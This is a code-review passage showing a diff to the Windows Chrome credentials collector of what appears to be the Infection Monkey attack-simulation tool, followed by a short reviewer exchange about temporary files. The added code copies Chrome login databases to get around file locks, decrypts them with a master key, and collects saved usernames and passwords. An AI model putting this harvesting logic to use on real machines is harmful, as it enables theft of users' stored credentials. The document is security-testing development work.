monkey/agent_plugins/credentials_collectors/chrome/src/windows_credentials_database_processor.py

```diff
@@ -1,16 +1,168 @@
-from typing import Collection
+import logging
+import shutil
+import sqlite3
+import string
+import tempfile
+from pathlib import Path
+from typing import Collection, List, Optional, Tuple
 
-from common.credentials import Credentials
+from Cryptodome.Cipher import AES
+
+from common.credentials import Credentials, EmailAddress, Password, Username
 from common.types import Event
+from common.utils.code_utils import secure_generate_random_string
+from infection_monkey.utils.threading import interruptible_iter
 
 from .utils import BrowserCredentialsDatabasePath
+from .windows_decryption import win32crypt_unprotect_data
 
+logger = logging.getLogger(__name__)
 
-class WindowsCredentialsDatabaseProcessor:
-    def __init__(self):
-        pass
 
+class WindowsCredentialsDatabaseProcessor:
     def __call__(
         self, interrupt: Event, database_paths: Collection[BrowserCredentialsDatabasePath]
     ) -> Collection[Credentials]:
-        return []
+        credentials = []
+
+        for item in interruptible_iter(database_paths, interrupt):
+            database_path = item.database_file_path
+            master_key = item.master_key
+
+            # copy database before querying it to bypass lock errors
+            temporary_database_path = self._copy_database(database_path)
+            if temporary_database_path:
+                try:
+                    credentials.extend(
+                        self._extract_credentials(
+                            temporary_database_path=temporary_database_path, master_key=master_key
+                        )
+                    )
+                except Exception as err:
+                    logger.debug(f"{err}")
+
+                self._remove_temporary_database(temporary_database_path)
+
+        return [
+            Credentials(
+                identity=self._get_identity(user),
+                secret=Password(password=password),
+            )
+            for user, password in set(credentials)
+        ]
+
+    @staticmethod
+    def _get_identity(user: str) -> str:
+        try:
+            return EmailAddress(email_address=user)
+        except ValueError:
+            return Username(username=user)
+
+    def _copy_database(self, database_path: Path) -> Optional[Path]:
```

Comment:
Why aren't we using `mkstemp()`? What's here isn't a security issue, but it could become one in the future.

Reply:
See next comment on using `tempfile.TemporaryFile()`.